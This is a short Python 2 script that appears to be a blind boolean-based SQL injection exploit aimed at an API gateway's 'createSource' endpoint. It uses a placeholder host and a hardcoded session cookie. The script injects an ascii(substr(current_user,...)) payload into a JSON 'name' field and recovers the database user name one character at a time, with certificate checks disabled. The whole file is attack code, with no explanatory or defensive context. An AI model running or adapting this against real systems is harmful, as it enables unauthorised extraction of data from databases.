1 import requests 2 import json 3 import warnings 4 warnings.filterwarnings("ignore") 5 6 url = 'https://1.1.1.1/xx/1.0/apiGateway/createSource' 7 headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'} 8 cookies = {'session': 'aaaaaaaatZSI6eyIgYiI6IllXUnRhVzQ9In19.DYkTeA.9GSxXpaWvW1vSMyUVxCRkXkkgTQ'} 9 answer = '' 10 11 12 for i in range(1,9): 13 for j in range(65, 123): 14 payload = '111\' and ascii(substr(current_user,'+str(i)+',1))='+str(j)+'--+' 15 # print payload 16 data = { 17 "name": "bobac", 18 "type": "1", 19 "protocol": "http", 20 "method": "POST", 21 "url": "www.www.com", 22 "port": "80", 23 "timeout": 3, 24 "params": [{ 25 "name": "a", 26 "changeParam": "true", 27 "position": "Parameter Path", 28 "type": "string", 29 "must": "true", 30 "default": "a" 31 }] 32 } 33 json_string = json.dumps(data) 34 # print type(json_string) 35 new_string = json_string.replace("bobac", payload) 36 new_data = json.loads(new_string) 37 # print new_data 38 # exit(0) 39 req = requests.post(url, headers=headers, cookies=cookies, json=new_data, verify=False) 40 # print req.text 41 # exit(0) 42 if 'xxxx' in req.text: 43 answer += chr(j) 44 print answer 45 print 'current_user is %s' % answer
